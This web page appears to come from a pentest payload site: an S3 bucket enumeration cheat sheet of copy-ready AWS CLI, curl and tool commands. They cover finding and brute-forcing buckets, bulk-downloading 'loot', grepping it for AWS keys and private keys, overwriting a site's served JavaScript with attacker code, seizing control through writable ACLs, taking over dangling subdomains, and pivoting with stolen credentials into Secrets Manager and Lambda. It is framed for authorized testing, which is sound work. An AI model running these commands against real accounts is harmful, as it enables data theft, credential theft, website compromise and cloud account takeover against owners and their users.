S3 Bucket Enumeration Cheat Sheet

AWS S3 bucket enumeration and misconfiguration testing: name discovery and brute force, anonymous/authenticated listing, ACL and bucket-policy checks, public object access, write/upload abuse, and subdomain takeover of dangling S3 endpoints. (43 payloads)

Try it interactively with the Subdomain Takeover Checker

Bucket Discovery & Naming Recon

(7)

# Resolve a name to confirm it's an S3 bucket / endpoint
nslookup <bucket>.s3.amazonaws.com
dig +short <bucket>.s3.amazonaws.com
# NXDOMAIN = no such bucket; CNAME to s3-*.amazonaws.com = exists

Confirm a candidate bucket exists via DNS before sending HTTP — buckets resolve under *.s3.amazonaws.com.Region-specific buckets resolve as <bucket>.s3.<region>.amazonaws.com

# Region disclosure via 301 + x-amz-bucket-region header
curl -sI https://<bucket>.s3.amazonaws.com/ | grep -i 'x-amz-bucket-region'
# 301 PermanentRedirect leaks the bucket's home region

A bucket in a non-us-east-1 region returns HTTP 301 with the x-amz-bucket-region header, confirming existence and revealing the region.Use the disclosed region for the s3.<region>.amazonaws.com endpoint

# Mine bucket names from page source, JS, and assets
curl -s https://target.com | grep -oE '[a-z0-9.-]+\.s3[.-][a-z0-9-]*\.amazonaws\.com'
curl -s https://target.com | grep -oE 's3://[a-z0-9.-]+'

Scrape live pages and JavaScript for hardcoded S3 hostnames and s3:// URIs that reveal real bucket names.Static assets are often served from a CDN-fronted public bucket

# Certificate Transparency can surface bucket-backed hostnames
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sort -u | grep -i s3

Pull hostnames from CT logs and filter for S3 endpoints or CNAMEs pointing at S3-backed sites.CNAMEs like assets.target.com -> bucket.s3.amazonaws.com are common

# Common naming patterns to feed a brute list
<company>
<company>-backup   <company>-backups
<company>-prod     <company>-dev    <company>-staging
<company>-assets   <company>-static <company>-media
<company>-logs     <company>-data   <company>-uploads
<company>-private  <company>-public <company>-config
<company>-terraform <company>-tfstate <company>-cf-templates

High-hit naming conventions to permute with the company name, product names, and environment suffixes.Bucket names are global — reuse known patterns across all of AWS

# GrayhatWarfare: search 300M+ already-indexed public objects
# https://buckets.grayhatwarfare.com/  (web UI + API)
curl -s "https://buckets.grayhatwarfare.com/api/v2/buckets/?keywords=<company>&access-token=<KEY>"

Query GrayhatWarfare's index of public buckets/objects to find exposed data without touching the target.Purely passive recon — no requests reach the target's infrastructure

# Google/Bing dorks for indexed bucket listings
site:s3.amazonaws.com <company>
site:s3.amazonaws.com inurl:<keyword>
site:amazonaws.com intitle:"index of" <company>
"<company>" site:s3-external-1.amazonaws.com

Search-engine dorks that surface bucket XML listings and objects search engines have already crawled.Also try s3.<region>.amazonaws.com and the dualstack/website endpoints

Listing Bucket Contents

(6)

# Anonymous listing — XML if ListBucket is public
curl -s https://<bucket>.s3.amazonaws.com/
# <ListBucketResult> with <Key> elements = readable & listable
# <Error><Code>AccessDenied</Code> = exists, listing denied
# <Code>NoSuchBucket</Code> = does not exist

Raw HTTP GET on the bucket root returns an XML listing when public-read ACL or a public ListBucket policy is set.Reading the XML Error code distinguishes denied vs nonexistent buckets

# AWS CLI without credentials
aws s3 ls s3://<bucket> --no-sign-request
aws s3 ls s3://<bucket> --no-sign-request --recursive --human-readable

List a bucket anonymously with the official CLI; --no-sign-request omits SigV4 signing for public access.--recursive walks every prefix; pipe to wc -l to gauge object count

# Authenticated listing with your own creds
aws s3 ls s3://<bucket> --recursive
aws s3 ls s3://<bucket> --region <region>
# AllUsers vs AuthenticatedUsers: a bucket may deny anon but allow ANY AWS account

Always retry listing with valid AWS credentials — the AuthenticatedUsers group grants access to every AWS principal, not just the owner.Free-tier creds from a throwaway AWS account defeat AuthenticatedUsers ACLs

# Paginate listing past the 1000-key cap via the REST API
curl -s "https://<bucket>.s3.amazonaws.com/?list-type=2&max-keys=1000"
curl -s "https://<bucket>.s3.amazonaws.com/?list-type=2&continuation-token=<TOKEN>"
curl -s "https://<bucket>.s3.amazonaws.com/?prefix=backups/&delimiter=/"

ListObjectsV2 returns max 1000 keys per call; follow NextContinuationToken and use prefix/delimiter to enumerate large buckets.delimiter=/ returns CommonPrefixes, letting you walk the folder tree

# Enumerate object versions (often left readable even when current is restricted)
aws s3api list-object-versions --bucket <bucket> --no-sign-request
curl -s "https://<bucket>.s3.amazonaws.com/?versions"

On versioning-enabled buckets, old versions of deleted/overwritten objects may still be downloadable.GetObjectVersion with ?versionId=<id> retrieves a specific historical object

# rclone for fast recursive listing & sync of an open bucket
rclone lsf :s3:<bucket> --s3-provider AWS --s3-no-check-bucket --s3-env-auth=false
rclone copy :s3:<bucket> ./loot --transfers 16

Use rclone with an anonymous S3 remote to list and bulk-download a public bucket quickly.Handles pagination and parallel transfers better than looping curl

Bucket Name Brute Force

(6)

# s3scanner: check a list of names for existence + open perms
s3scanner -bucket-file names.txt -enumerate
s3scanner scan -bucket <bucket>   # single bucket, reports ACL state

s3scanner validates candidate bucket names and reports whether read/write/ACL are open, across regions.-enumerate dumps object listings for buckets it finds readable

# cloud_enum: AWS/Azure/GCP bucket+service brute from a keyword
cloud_enum -k <company> -k <product> --disable-azure --disable-gcp -l ce.log

Generates permutations from keywords and probes S3 (plus Azure blobs and GCP buckets) for open/protected/nonexistent state.Built-in mutation list covers dev/prod/backup/static-style suffixes

# ffuf: brute the bucket name in the Host-style URL, filter by status
ffuf -w names.txt -u https://FUZZ.s3.amazonaws.com/ -mc 200,403 -fc 404 -o ffuf-s3.json
# 200 = listable, 403 = exists (denied), 404 = no such bucket

Fuzz the subdomain position with ffuf and triage by HTTP status to separate live buckets from nonexistent names.403 still means the bucket exists — worth retrying authenticated

# Permute a wordlist with environments/affixes before brute
for n in $(cat base.txt); do for s in '' -prod -dev -staging -backup -assets -logs; do echo "$n$s"; echo "$n$s-$RANDOM" ; done; done | sort -u > names.txt

Expand base names with common environment and purpose suffixes to widen brute-force coverage.Mutation tools (cloud_enum, lazys3) automate this permutation step

# lazys3 / bucket_finder classic Ruby brute helpers
ruby lazys3.rb <company>
ruby bucket_finder.rb names.txt --download

Lightweight wordlist-driven brute tools that try common permutations and optionally auto-download readable buckets.bucket_finder also reports buckets that exist but deny listing

# Rate-limit awareness: distribute across regional endpoints
https://<name>.s3.amazonaws.com/
https://<name>.s3.us-west-2.amazonaws.com/
https://<name>.s3.eu-west-1.amazonaws.com/

Spread brute traffic across regional endpoints; some buckets only answer on their home region's hostname.us-east-1 uses the bare s3.amazonaws.com host with no region label

ACL & Bucket Policy Checks

(6)

# Read the bucket ACL (grantees)
aws s3api get-bucket-acl --bucket <bucket> --no-sign-request
aws s3api get-bucket-acl --bucket <bucket>   # authenticated
# Look for URI .../groups/global/AllUsers or .../AuthenticatedUsers

GetBucketAcl exposes grantees; AllUsers = anonymous access, AuthenticatedUsers = any AWS account.READ_ACP grant lets you read the ACL even when object read is denied

# Read the object-level ACL for a specific key
aws s3api get-object-acl --bucket <bucket> --key path/to/file --no-sign-request

Object ACLs override bucket settings — an object can be world-readable inside an otherwise locked bucket.Enumerate per-object ACLs when bucket listing is allowed but downloads 403

# Dump the bucket policy JSON (if GetBucketPolicy is allowed)
aws s3api get-bucket-policy --bucket <bucket> --output text | jq .
# Hunt for Principal:"*", broad Action s3:*, and missing Condition blocks

The bucket policy reveals which principals/actions are allowed; wildcard Principal with no Condition is a public exposure.Policies can grant write/delete to * even when ACLs look locked down

# Check Public Access Block — the master kill-switch
aws s3api get-public-access-block --bucket <bucket>
# All four flags true = bucket can't be made public regardless of ACL/policy

GetPublicAccessBlock shows whether BlockPublicAcls / IgnorePublicAcls / BlockPublicPolicy / RestrictPublicBuckets are enforced.If absent or all false, ACL/policy misconfigs actually take effect

# Probe each permission individually
aws s3api get-bucket-acl --bucket <b> --no-sign-request   # READ_ACP
aws s3 ls s3://<b> --no-sign-request                      # READ (list)
aws s3 cp ./poc.txt s3://<b>/poc.txt --no-sign-request    # WRITE
aws s3api put-bucket-acl --bucket <b> --acl public-read --no-sign-request  # WRITE_ACP

Systematically test READ, WRITE, READ_ACP, and WRITE_ACP — each is a separate grant and may be open independently.WRITE_ACP is critical: it lets you rewrite the ACL and seize control

# Block-public-access bypass mindset: ACLs ignored != policy ignored
# IgnorePublicAcls only neutralizes ACLs; a public *bucket policy* still
# applies unless BlockPublicPolicy/RestrictPublicBuckets are also set.
aws s3api get-bucket-policy-status --bucket <bucket>

GetBucketPolicyStatus reports IsPublic for the policy; partial Public Access Block settings still leave policy-based exposure.Misconfigured accounts often block ACLs but forget policy controls

Reading Public Objects & Loot

(6)

# Direct object fetch (no listing needed if you know the key)
curl -s https://<bucket>.s3.amazonaws.com/path/to/secret.env -o secret.env
aws s3 cp s3://<bucket>/backup.sql ./ --no-sign-request

Objects can be world-readable even when listing is denied — guessable keys are downloadable directly.Predictable names (db.sql, .env, backup.zip, config.json) are prime targets

# Bulk-pull everything from an open bucket
aws s3 sync s3://<bucket> ./loot --no-sign-request
aws s3 cp s3://<bucket> ./loot --recursive --no-sign-request

sync/cp --recursive downloads the full readable bucket for offline triage.sync resumes and skips already-downloaded files on re-runs

# High-value object keys to grep for after download
grep -rIl -E 'AKIA[0-9A-Z]{16}|aws_secret_access_key|BEGIN.*PRIVATE KEY|password|api[_-]?key' ./loot

Scan downloaded objects for AWS keys, private keys, and credentials commonly left in backups and config files.AKIA-prefixed access keys can be tested with aws sts get-caller-identity

# Terraform state & CloudFormation = infra + secrets goldmine
aws s3 cp s3://<bucket>/terraform.tfstate ./ --no-sign-request
# tfstate stores resource attributes incl. plaintext secrets, RDS passwords

State files and IaC templates frequently sit in '-tfstate'/'-cf-templates' buckets and embed live secrets.Search keys for tfstate, .tfvars, cloudformation, parameters.json

# Snapshot recovery via object versions
aws s3api list-object-versions --bucket <bucket> --prefix config/ --no-sign-request
aws s3api get-object --bucket <bucket> --key config/.env --version-id <ID> out.env --no-sign-request

Retrieve previous versions of sensitive files that were 'deleted' or sanitized but never purged.Deleted current objects leave a delete-marker but versions persist

# Inspect the S3 static-website endpoint separately
curl -s http://<bucket>.s3-website-<region>.amazonaws.com/
curl -sI http://<bucket>.s3-website.<region>.amazonaws.com/

The website endpoint serves index/error documents and may expose different content/behavior than the REST endpoint.Website endpoints are HTTP-only and ignore the XML REST listing

Writable Buckets & S3 Takeover

(6)

# Confirm anonymous write (high severity)
echo 'pentest-poc' > poc.txt
aws s3 cp poc.txt s3://<bucket>/poc-$(date +%s).txt --no-sign-request
curl -s https://<bucket>.s3.amazonaws.com/poc-*.txt   # verify it stuck

A successful anonymous PutObject proves world-writable storage — attackers can plant malware, deface, or stage phishing.Use a benign, timestamped PoC file and remove it after confirming

# Overwrite assets served by a site backed by the bucket
aws s3 cp evil.js s3://<bucket>/static/app.js --no-sign-request --content-type application/javascript
# If site loads app.js, this is stored XSS / supply-chain on every visitor

Writable buckets that back a website let you overwrite served JS/HTML, escalating to client-side code execution for all users.Check Cache-Control/CDN TTL — CloudFront may cache the old file

# Hijack the ACL when WRITE_ACP is open
aws s3api put-bucket-acl --bucket <bucket> --grant-full-control id=<your-canonical-id> --no-sign-request
aws s3api put-object-acl --bucket <bucket> --key file --acl public-read --no-sign-request

WRITE_ACP lets you grant yourself full control or flip objects to public-read, defeating other restrictions.Get your canonical ID via: aws s3api list-buckets --query Owner.ID

# Detect a dangling S3 CNAME (takeover precondition)
dig +short CNAME assets.target.com
# -> <bucket>.s3.amazonaws.com  but bucket returns NoSuchBucket = claimable
curl -s https://assets.target.com | grep -i 'NoSuchBucket'

A live DNS CNAME pointing to a deleted/nonexistent bucket is a subdomain takeover — the 'NoSuchBucket' error is the fingerprint.Region matters: you must recreate the bucket in the original region

# Claim the dangling bucket to complete takeover (authorized scope only)
aws s3api create-bucket --bucket <missing-bucket> --region <region> \
  --create-bucket-configuration LocationConstraint=<region>
aws s3 website s3://<missing-bucket> --index-document index.html
aws s3 cp proof.html s3://<missing-bucket>/index.html --acl public-read

Recreate the missing bucket name in the correct region to serve attacker content on the victim's subdomain.us-east-1 omits LocationConstraint; report and release the name after PoC

# Automated takeover screening across many hosts
nuclei -l live-hosts.txt -t http/takeovers/aws-bucket-takeover.yaml
# plus the manual NoSuchBucket grep above for confirmation

Run takeover templates to flag S3-backed hosts returning claimable errors at scale, then verify each manually.Always confirm region + NoSuchBucket before attempting to claim

Post-Access AWS Enumeration

(6)

# Validate any AWS keys you looted
export AWS_ACCESS_KEY_ID=AKIA...; export AWS_SECRET_ACCESS_KEY=...
aws sts get-caller-identity   # who am I + account ID
aws s3 ls                     # buckets this principal can see

Test recovered access keys against STS to confirm validity and identity, then enumerate reachable buckets.get-caller-identity works with almost any valid policy — safe first call

# Map S3-related permissions of the current principal
aws iam get-user 2>/dev/null
aws iam list-attached-user-policies --user-name <user>
aws iam simulate-principal-policy --policy-source-arn <arn> --action-names s3:PutBucketPolicy s3:GetObject s3:PutObject

Determine what S3 (and IAM) actions your stolen identity can perform before acting, including policy simulation.simulate-principal-policy avoids noisy trial-and-error API calls

# Cross-account/owner discovery on an open bucket
aws s3api list-buckets --query 'Owner.ID' --output text
aws s3api get-bucket-acl --bucket <bucket> --query 'Owner'

Identify the bucket owner's canonical ID and account to scope ownership and report attribution accurately.Owner canonical ID differs from the 12-digit account number

# Check logging/observability to assess detection risk
aws s3api get-bucket-logging --bucket <bucket>
aws cloudtrail describe-trails 2>/dev/null
aws s3api get-bucket-notification-configuration --bucket <bucket>

Review server access logging, CloudTrail data events, and event notifications to understand what your access generates.S3 data-event logging in CloudTrail is off by default in many accounts

# Pivot: enumerate other services with valid creds
aws s3 ls                       # storage
aws ec2 describe-instances       # compute
aws secretsmanager list-secrets  # secrets
aws lambda list-functions        # code + env vars

Use confirmed credentials to expand from S3 into other services that frequently hold further secrets and access.Lambda env vars and Secrets Manager often store DB and API creds

# Bucket region/endpoint sanity for scoped, non-destructive testing
aws s3api get-bucket-location --bucket <bucket> --no-sign-request
aws s3api head-bucket --bucket <bucket> --no-sign-request

head-bucket and get-bucket-location confirm existence/region with minimal footprint before deeper, scoped enumeration.head-bucket returns 200/403/404 without listing object contents

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Cheat Sheets

IDOR Cheat Sheet Cloud Attacks Cheat Sheet Cloud Security Cheat Sheet Subdomain Enumeration Cheat Sheet

Frequently asked questions

What is the S3 Bucket Enumeration Cheat Sheet?+

It's a quick-reference collection of 43 S3 Bucket Enum payloads for testing S3 Bucket Enumeration vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.

How do I use these S3 Bucket Enum payloads?+

Copy any payload straight into your authorized test, or use the Subdomain Takeover Checker to apply them interactively. Only test systems you have explicit permission to assess.

Are these S3 Bucket Enum payloads free to use?+

Yes — this cheat sheet and all S3 Bucket Enum payloads are completely free, with no account required. Everything runs in your browser.

$loading...

Frequently asked questions

What is the S3 Bucket Enumeration Cheat Sheet?+

How do I use these S3 Bucket Enum payloads?+

Copy any payload straight into your authorized test, or use the Subdomain Takeover Checker to apply them interactively. Only test systems you have explicit permission to assess.

Are these S3 Bucket Enum payloads free to use?+

Yes — this cheat sheet and all S3 Bucket Enum payloads are completely free, with no account required. Everything runs in your browser.

S3 Bucket Enumeration Cheat Sheet

Bucket Discovery & Naming Recon

Listing Bucket Contents

Bucket Name Brute Force

ACL & Bucket Policy Checks

Reading Public Objects & Loot

Writable Buckets & S3 Takeover

Post-Access AWS Enumeration

Related Tools

Related Cheat Sheets

Frequently asked questions

S3 Bucket Enumeration Cheat Sheet

Bucket Discovery & Naming Recon

Listing Bucket Contents

Bucket Name Brute Force

ACL & Bucket Policy Checks

Reading Public Objects & Loot

Writable Buckets & S3 Takeover

Post-Access AWS Enumeration

Related Tools

Related Cheat Sheets

Frequently asked questions